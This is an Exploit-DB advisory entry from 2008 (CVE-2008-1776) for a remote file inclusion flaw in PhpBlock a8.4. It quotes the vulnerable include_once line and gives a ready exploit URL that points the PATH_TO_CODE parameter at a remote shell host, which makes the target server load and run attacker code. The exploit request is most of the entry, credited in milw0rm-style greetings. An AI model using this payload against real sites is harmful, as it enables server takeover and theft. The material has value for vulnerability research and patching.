PhpBlock a8.4 PATH_TO_CODE Remote File Inclusion Vulnerability

2008-04-02T00:00:00
ID EDB-ID:5348
Type exploitdb
Reporter w0cker
Modified 2008-04-02T00:00:00

Description

PhpBlock a8.4 (PATH_TO_CODE) Remote File Inclusion Vulnerability. CVE-2008-1776. Webapps exploit for php platform

                                        
                                            Script Name : PHP Block a8.4
 
Download : http://sourceforge.net/project/downloading.php?group_id=186381&use_mirror=surfnet&filename=a8.4.zip&73507325
 
Error : include_once $PATH_TO_CODE."/script/fonction.php";
 
Vul Code : http://[site]/[Path]/modules/basicfog/basicfogfactory.class.php?PATH_TO_CODE=http://[ShellCode]
 
Greetz : Kezzap66345 - Str0ke - Dread 35

# milw0rm.com [2008-04-02]